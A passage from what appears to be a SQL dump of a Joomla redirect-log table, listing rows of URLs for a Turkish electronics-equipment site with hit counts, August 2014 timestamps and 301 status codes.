00:00:00',301),(4697,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=140&Itemid=142','','','',1,0,'2014-08-27 19:48:21','0000-00-00 00:00:00',301),(4698,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=174:rh61&catid=60:ikinciel&Itemid=164&lang=en','','','',2,0,'2014-08-27 19:53:49','0000-00-00 00:00:00',301),(4699,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=150&Itemid=151&lang=en','','','',2,0,'2014-08-27 19:54:55','0000-00-00 00:00:00',301),(4700,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=41&Itemid=55','','','',1,0,'2014-08-27 19:56:00','0000-00-00 00:00:00',301),(4701,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=41:smd-firin&Itemid=55&layout=default','','','',2,0,'2014-08-27 19:59:50','0000-00-00 00:00:00',301),(4702,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=109&Itemid=120&lang=tr','','','',1,0,'2014-08-27 20:01:28','0000-00-00 00:00:00',301),(4703,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=173:avf1&catid=60:ikinciel&Itemid=164&lang=tr','','','',2,0,'2014-08-27 20:03:06','0000-00-00 00:00:00',301),(4704,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=51&Itemid=92','','','',1,0,'2014-08-27 20:06:23','0000-00-00 00:00:00',301),(4705,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=43:ultra-hizli&Itemid=2&layout=default','','','',2,0,'2014-08-27 20:06:56','0000-00-00 00:00:00',301),(4706,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=164:ews-310&catid=44:pota&Itemid=160&lang=tr','','','',2,0,'2014-08-27 20:09:40','0000-00-00 00:00:00',301),(4707,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=40:temizleme&Itemid=60&layout=default&lang=tr&limitstart=10','','','',2,0,'2014-08-27 20:10:13','0000-00-00 00:00:00',301),(4708,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=108:yuksek-guclu-flux-giderici-spr&catid=40:temizleme&Itemid=119&lang=en','','','',2,0,'2014-08-27 20:11:51','0000-00-00 00:00:00',301),(4709,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=57&Itemid=145','','','',2,0,'2014-08-27 20:13:29','0000-00-00 00:00:00',301),(4710,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=147:sp18p-l-screen-printer&catid=57:screen-printer&Itemid=146&lang=en','','','',2,0,'2014-08-27 20:14:34','0000-00-00 00:00:00',301),(4711,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=106:mi-300&catid=44:pota&Itemid=113&lang=en','','','',2,0,'2014-08-27 20:15:40','0000-00-00 00:00:00',301),(4712,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=119&Itemid=117&lang=tr','','','',2,0,'2014-08-27 20:17:18','0000-00-00 00:00:00',301),(4713,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=109&Itemid=120','','','',3,0,'2014-08-27 20:18:24','0000-00-00 00:00:00',301),(4714,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=47:aoi&Itemid=1&layout=default','','','',2,0,'2014-08-27 20:19:30','0000-00-00 00:00:00',301),(4715,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=149&Itemid=150','','','',1,0,'2014-08-27 20:22:13','0000-00-00 00:00:00',301),(4716,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=145:asp-300&catid=57:screen-printer&Itemid=147&lang=tr','','','',4,0,'2014-08-27 20:24:24','0000-00-00 00:00:00',301),(4717,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=112:smd-firin-temizleme-roc&catid=40:temizleme&Itemid=123','','','',1,0,'2014-08-27 20:25:30','0000-00-00 00:00:00',301),(4718,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=159:gf-c2-ht&catid=41:smd-firin&Itemid=162&lang=en','','','',3,0,'2014-08-27 20:26:03','0000-00-00 00:00:00',301),(4719,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=114&Itemid=124','','','',2,0,'2014-08-27 20:26:35','0000-00-00 00:00:00',301),(4720,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=1&layout=blog&Itemid=28&lang=en','','','',1,0,'2014-08-27 20:27:41','0000-00-00 00:00:00',301),(4721,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=50&lang=tr&limitstart=5','','','',1,0,'2014-08-27 20:28:14','0000-00-00 00:00:00',301),(4722,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=155&Itemid=81&lang=en','','','',3,0,'2014-08-27 20:29:19','0000-00-00 00:00:00',301),(4723,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=159:gf-c2-ht&catid=41:smd-firin&Itemid=162&lang=en','','','',1,0,'2014-08-27 20:30:24','0000-00-00 00:00:00',301),(4724,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=157&Itemid=158&lang=tr','','','',3,0,'2014-08-27 20:31:32','0000-00-00 00:00:00',301),(4725,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=43:ultra-hizli&Itemid=2&layout=default&lang=en','','','',2,0,'2014-08-27 20:32:03','0000-00-00 00:00:00',301),(4726,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=117&Itemid=128&lang=en','','','',5,0,'2014-08-27 20:32:36','0000-00-00 00:00:00',301),(4727,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=145&Itemid=147&lang=en','','','',2,0,'2014-08-27 20:34:14','0000-00-00 00:00:00',301),(4728,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=46:konveyorler&Itemid=62&layout=default&lang=tr','','','',1,0,'2014-08-27 20:34:47','0000-00-00 00:00:00',301),(4729,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=106&Itemid=113&lang=tr','','','',3,0,'2014-08-27 20:35:20','0000-00-00 00:00:00',301),(4730,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=149&Itemid=150&lang=en','','','',2,0,'2014-08-27 20:35:53','0000-00-00 00:00:00',301),(4731,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=109&Itemid=120&lang=tr','','','',2,0,'2014-08-27 20:37:32','0000-00-00 00:00:00',301),(4732,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=97&Itemid=108&lang=tr','','','',4,0,'2014-08-27 20:38:04','0000-00-00 00:00:00',301),(4733,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=139&Itemid=141&lang=en','','','',2,0,'2014-08-27 20:38:36','0000-00-00 00:00:00',301),(4734,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=140&Itemid=142&lang=en','','','',2,0,'2014-08-27 20:39:09','0000-00-00 00:00:00',301),(4735,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=54:pcb-ve-stensil-temizleme-makineleri&Itemid=114&layout=default&lang=en','','','',3,0,'2014-08-27 20:39:43','0000-00-00 00:00:00',301),(4736,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=54:pcb-ve-stensil-temizleme-makineleri&Itemid=114&layout=default&lang=tr','','','',2,0,'2014-08-27 20:41:21','0000-00-00 00:00:00',301),(4737,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=166:lfs-1&catid=44:pota&Itemid=144','','','',1,0,'2014-08-27 20:41:55','0000-00-00 00:00:00',301),(4738,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=36&Itemid=37&lang=tr','','','',2,0,'2014-08-27 20:42:26','0000-00-00 00:00:00',301),(4739,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=39&Itemid=57&lang=en','','','',2,0,'2014-08-27 20:42:59','0000-00-00 00:00:00',301),(4740,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=139&Itemid=141','','','',1,0,'2014-08-27 20:43:32','0000-00-00 00:00:00',301),(4741,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=59&Itemid=155','','','',1,0,'2014-08-27 20:44:04','0000-00-00 00:00:00',301),(4742,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=86:mx350&catid=36:orta-hizli&Itemid=98&lang=en','','','',4,0,'2014-08-27 20:44:37','0000-00-00 00:00:00',301),(4743,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=107:yuksek-guclu-flux-giderici-frc&catid=40:temizleme&Itemid=118&lang=tr','','','',2,0,'2014-08-27 20:45:11','0000-00-00 00:00:00',301),(4744,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=83&Itemid=95&lang=tr','','','',2,0,'2014-08-27 20:45:43','0000-00-00 00:00:00',301),(4745,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=80&Itemid=87','','','',1,0,'2014-08-27 20:46:16','0000-00-00 00:00:00',301),(4746,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=39&Itemid=57','','','',2,0,'2014-08-27 20:47:23','0000-00-00 00:00:00',301),(4747,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=149:cs40&catid=58:dusuk-hizli-smd-dizgi&Itemid=150','','','',4,0,'2014-08-27 20:48:27','0000-00-00 00:00:00',301),(4748,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=60&Itemid=164','','','',1,0,'2014-08-27 20:48:59','0000-00-00 00:00:00',301),(4749,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=60:ikinciel&Itemid=164&layout=default&lang=tr','','','',2,0,'2014-08-27 20:49:32','0000-00-00 00:00:00',301),(4750,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=42:th-dizgi&Itemid=27&layout=default&lang=tr','','','',2,0,'2014-08-27 20:50:38','0000-00-00 00:00:00',301),(4751,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=1&layout=blog&Itemid=28&lang=tr','','','',1,0,'2014-08-27 20:51:10','0000-00-00 00:00:00',301),(4752,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=39&Itemid=57&lang=tr','','','',2,0,'2014-08-27 20:55:33','0000-00-00 00:00:00',301),(4753,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=110&Itemid=121&lang=en','','','',2,0,'2014-08-27 20:56:06','0000-00-00 00:00:00',301),(4754,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=87:temizlik&catid=40:temizleme&Itemid=103&lang=tr','','','',2,0,'2014-08-27 20:56:38','0000-00-00 00:00:00',301),(4755,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=58&Itemid=149','','','',2,0,'2014-08-27 20:58:17','0000-00-00 00:00:00',301),(4756,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=109&Itemid=120&lang=en','','','',2,0,'2014-08-27 21:01:00','0000-00-00 00:00:00',301),(4757,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=145:asp-300&catid=57:screen-printer&Itemid=147&lang=en','','','',2,0,'2014-08-27 21:01:34','0000-00-00 00:00:00',301),(4758,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=172:avb1&catid=60:ikinciel&Itemid=164&lang=tr','','','',2,0,'2014-08-27 21:02:39','0000-00-00 00:00:00',301),(4759,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=98&Itemid=109&lang=tr','','','',2,0,'2014-08-27 21:10:51','0000-00-00 00:00:00',301),(4760,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=158:14fsfd&catid=44:pota&Itemid=159','','','',1,0,'2014-08-27 21:11:23','0000-00-00 00:00:00',301),(4761,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=51:neo&Itemid=92&layout=default&lang=tr','','','',1,0,'2014-08-27 21:11:56','0000-00-00 00:00:00',301),(4762,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=149&Itemid=150&lang=en','','','',1,0,'2014-08-27 21:12:29','0000-00-00 00:00:00',301),(4763,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=141&Itemid=143&lang=en','','','',2,0,'2014-08-27 21:13:34','0000-00-00 00:00:00',301),(4764,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=56&Itemid=137&lang=en','','','',1,0,'2014-08-27 21:15:45','0000-00-00 00:00:00',301),(4765,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=98&Itemid=109&lang=en','','','',2,0,'2014-08-27 21:16:18','0000-00-00 00:00:00',301),(4766,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=105&Itemid=112&lang=en','','','',2,0,'2014-08-27 21:17:24','0000-00-00 00:00:00',301),(4767,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=154:spa-300&catid=59:bolgesel-lehimleme-mak&Itemid=156&lang=en','','','',2,0,'2014-08-27 21:18:29','0000-00-00 00:00:00',301),(4768,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=105:r-500&catid=41:smd-firin&Itemid=112&lang=en','','','',2,0,'2014-08-27 21:19:35','0000-00-00 00:00:00',301),(4769,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=57:screen-printer&Itemid=145&layout=default&lang=en','','','',4,0,'2014-08-27 21:20:08','0000-00-00 00:00:00',301),(4770,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=72:av131&catid=42:th-dizgi&Itemid=78&lang=en','','','',2,0,'2014-08-27 21:21:26','0000-00-00 00:00:00',301),(4771,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=152&Itemid=153&lang=en','','','',2,0,'2014-08-27 21:21:46','0000-00-00 00:00:00',301),(4772,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=40:temizleme&Itemid=60&layout=default&lang=en&limitstart=10','','','',4,0,'2014-08-27 21:22:20','0000-00-00 00:00:00',301),(4773,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=56&Itemid=137&lang=en','','','',1,0,'2014-08-27 21:25:05','0000-00-00 00:00:00',301),(4774,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=122&Itemid=129&lang=tr','','','',2,0,'2014-08-27 21:30:31','0000-00-00 00:00:00',301),(4775,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=138&Itemid=140&lang=en','','','',2,0,'2014-08-27 21:34:23','0000-00-00 00:00:00',301),(4776,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=155:ct-3000n&catid=44:pota&Itemid=81&lang=tr','','','',2,0,'2014-08-27 21:34:53','0000-00-00 00:00:00',301),(4777,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=56&Itemid=&lang=en','','','',1,0,'2014-08-27 21:35:47','0000-00-00 00:00:00',301),(4778,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=113&Itemid=125&lang=en','','','',2,0,'2014-08-27 21:35:59','0000-00-00 00:00:00',301),(4779,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=93&Itemid=104','','','',1,0,'2014-08-27 21:36:31','0000-00-00 00:00:00',301),(4780,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=109:orta-guclu-flux-giderici-dc1&catid=40:temizleme&Itemid=120&lang=en','','','',2,0,'2014-08-27 21:39:59','0000-00-00 00:00:00',301),(4781,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=51&Itemid=92&lang=en','','','',2,0,'2014-08-27 21:43:04','0000-00-00 00:00:00',301),(4782,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=120:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=116&lang=en','','','',2,0,'2014-08-27 21:43:46','0000-00-00 00:00:00',301),(4783,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=175:rh2&catid=60:ikinciel&Itemid=164&lang=en','','','',2,0,'2014-08-27 21:44:11','0000-00-00 00:00:00',301),(4784,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=57&Itemid=145&lang=en','','','',2,0,'2014-08-27 21:47:27','0000-00-00 00:00:00',301),(4785,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=90&Itemid=102','','','',3,0,'2014-08-27 21:50:14','0000-00-00 00:00:00',301),(4786,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=105&Itemid=112&lang=tr','','','',2,0,'2014-08-27 21:51:16','0000-00-00 00:00:00',301),(4787,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=140&Itemid=142&lang=tr','','','',2,0,'2014-08-27 21:52:54','0000-00-00 00:00:00',301),(4788,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=60&Itemid=164&lang=tr','','','',4,0,'2014-08-27 21:54:00','0000-00-00 00:00:00',301),(4789,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=42&Itemid=27&lang=en','','','',2,0,'2014-08-27 21:55:38','0000-00-00 00:00:00',301),(4790,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=41:smd-firin&Itemid=55&layout=default&lang=en','','','',1,0,'2014-08-27 21:57:17','0000-00-00 00:00:00',301),(4791,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=140:sharpshooter&catid=56:rework-stasyonlari&Itemid=142','','','',1,0,'2014-08-27 21:57:49','0000-00-00 00:00:00',301),(4792,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=106:mi-300&catid=44:pota&Itemid=113&lang=tr','','','',2,0,'2014-08-27 22:00:33','0000-00-00 00:00:00',301),(4793,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=168&Itemid=58','','','',1,0,'2014-08-27 22:03:17','0000-00-00 00:00:00',301),(4794,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=58&Itemid=149&lang=en','','','',2,0,'2014-08-27 22:03:50','0000-00-00 00:00:00',301),(4795,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=36:orta-hizli&Itemid=37&layout=default&lang=tr','','','',2,0,'2014-08-27 22:04:55','0000-00-00 00:00:00',301),(4796,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=83&Itemid=95','','','',1,0,'2014-08-27 22:05:28','0000-00-00 00:00:00',301),(4797,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=54&Itemid=114','','','',1,0,'2014-08-27 22:09:18','0000-00-00 00:00:00',301),(4798,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=138&Itemid=140','','','',1,0,'2014-08-27 22:09:50','0000-00-00 00:00:00',301),(4799,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=173:avf1&catid=60:ikinciel&Itemid=&lang=en','','','',1,0,'2014-08-27 22:12:36','0000-00-00 00:00:00',301),(4800,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=36&Itemid=0&lang=tr','','','',1,0,'2014-08-27 22:13:48','0000-00-00 00:00:00',301),(4801,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=105&Itemid=112','','','',1,0,'2014-08-27 22:17:15','0000-00-00 00:00:00',301),(4802,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=55:katalog&Itemid=1&layout=default&lang=tr','','','',1,0,'2014-08-27 22:21:52','0000-00-00 00:00:00',301),(4803,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=107&Itemid=118&lang=tr','','','',3,0,'2014-08-27 22:26:13','0000-00-00 00:00:00',301),(4804,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=165:microcare&catid=1:son-haberler&Itemid=28&lang=tr','','','',1,0,'2014-08-27 22:26:32','0000-00-00 00:00:00',301),(4805,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=44:pota&Itemid=56&layout=default&lang=en','','','',1,0,'2014-08-27 22:27:19','0000-00-00 00:00:00',301),(4806,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=149&Itemid=150&lang=tr','','','',3,0,'2014-08-27 22:27:54','0000-00-00 00:00:00',301),(4807,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=145&Itemid=147&lang=tr','','','',2,0,'2014-08-27 22:28:26','0000-00-00 00:00:00',301),(4808,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=122&Itemid=129&lang=en','','','',2,0,'2014-08-27 22:30:35','0000-00-00 00:00:00',301),(4809,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=145&Itemid=147&lang=tr','','','',1,0,'2014-08-27 22:31:33','0000-00-00 00:00:00',301),(4810,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=55&Itemid=1&lang=tr','','','',3,0,'2014-08-27 22:31:45','0000-00-00 00:00:00',301),(4811,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=87&Itemid=99&lang=tr','','','',2,0,'2014-08-27 22:32:52','0000-00-00 00:00:00',301),(4812,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=167&Itemid=163&lang=en','','','',3,0,'2014-08-27 22:35:01','0000-00-00 00:00:00',301),(4813,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=107&Itemid=118&lang=en','','','',4,0,'2014-08-27 22:35:34','0000-00-00 00:00:00',301),(4814,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=160&Itemid=161&lang=tr','','','',4,0,'2014-08-27 22:37:09','0000-00-00 00:00:00',301),(4815,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=41:smd-firin&Itemid=55&layout=default&lang=en','','','',1,0,'2014-08-27 22:37:44','0000-00-00 00:00:00',301),(4816,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=146&Itemid=148&lang=en','','','',4,0,'2014-08-27 22:38:48','0000-00-00 00:00:00',301),(4817,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=93&Itemid=104&lang=tr','','','',2,0,'2014-08-27 22:57:25','0000-00-00 00:00:00',301),(4818,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=114:stensil-temizleme-rulolari-microwipe&catid=40:temizleme&Itemid=124&lang=en','','','',2,0,'2014-08-27 22:57:40','0000-00-00 00:00:00',301),(4819,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=72:av131&catid=42:th-dizgi&Itemid=78&lang=en','','','',2,0,'2014-08-27 22:58:21','0000-00-00 00:00:00',301),(4820,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=173:avf1&catid=60:ikinciel&Itemid=164','','','',1,0,'2014-08-27 23:14:02','0000-00-00 00:00:00',301),(4821,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=137:chip-max-rosh-rdy&catid=56:rework-stasyonlari&Itemid=139&lang=tr','','','',1,0,'2014-08-27 23:15:47','0000-00-00 00:00:00',301),(4822,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=110:ekonomik-flux-giderici-pro&catid=40:temizleme&Itemid=&lang=tr','','','',1,0,'2014-08-27 23:19:06','0000-00-00 00:00:00',301),(4823,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=174:rh61&catid=60:ikinciel&Itemid=0&lang=tr','','','',2,0,'2014-08-27 23:24:10','0000-00-00 00:00:00',301),(4824,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=58:dusuk-hizli-smd-dizgi&Itemid=149&layout=default&lang=tr','','','',4,0,'2014-08-27 23:53:22','0000-00-00 00:00:00',301),(4825,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=173:avf1&catid=60:ikinciel&Itemid=164&lang=en','','','',2,0,'2014-08-28 00:05:08','0000-00-00 00:00:00',301),(4826,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=91:osai-neo&catid=1:son-haberler&Itemid=28&lang=tr','','','',2,0,'2014-08-28 00:11:09','0000-00-00 00:00:00',301),(4827,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=105:r-500&catid=41:smd-firin&Itemid=112&lang=tr','','','',3,0,'2014-08-28 00:14:58','0000-00-00 00:00:00',301),(4828,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=166&Itemid=144','','','',2,0,'2014-08-28 00:15:31','0000-00-00 00:00:00',301),(4829,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=90&Itemid=102&lang=tr','','','',4,0,'2014-08-28 00:16:04','0000-00-00 00:00:00',301),(4830,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=117:optik-cihaz-temizleyicileri&catid=40:temizleme&Itemid=128&lang=tr','','','',2,0,'2014-08-28 00:16:36','0000-00-00 00:00:00',301),(4831,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=111:stencil-temizleme-bga&catid=40:temizleme&Itemid=122&lang=en','','','',2,0,'2014-08-28 00:17:09','0000-00-00 00:00:00',301),(4832,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=160&Itemid=161&lang=en','','','',1,0,'2014-08-28 00:18:48','0000-00-00 00:00:00',301),(4833,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=89&Itemid=101&lang=en','','','',1,0,'2014-08-28 00:19:21','0000-00-00 00:00:00',301),(4834,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=42&Itemid=27','','','',1,0,'2014-08-28 00:20:59','0000-00-00 00:00:00',301),(4835,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=119&Itemid=117&lang=en','','','',2,0,'2014-08-28 00:23:11','0000-00-00 00:00:00',301),(4836,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=88&Itemid=100&lang=en','','','',2,0,'2014-08-28 00:23:42','0000-00-00 00:00:00',301),(4837,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=40:temizleme&Itemid=60&layout=default','','','',2,0,'2014-08-28 00:24:15','0000-00-00 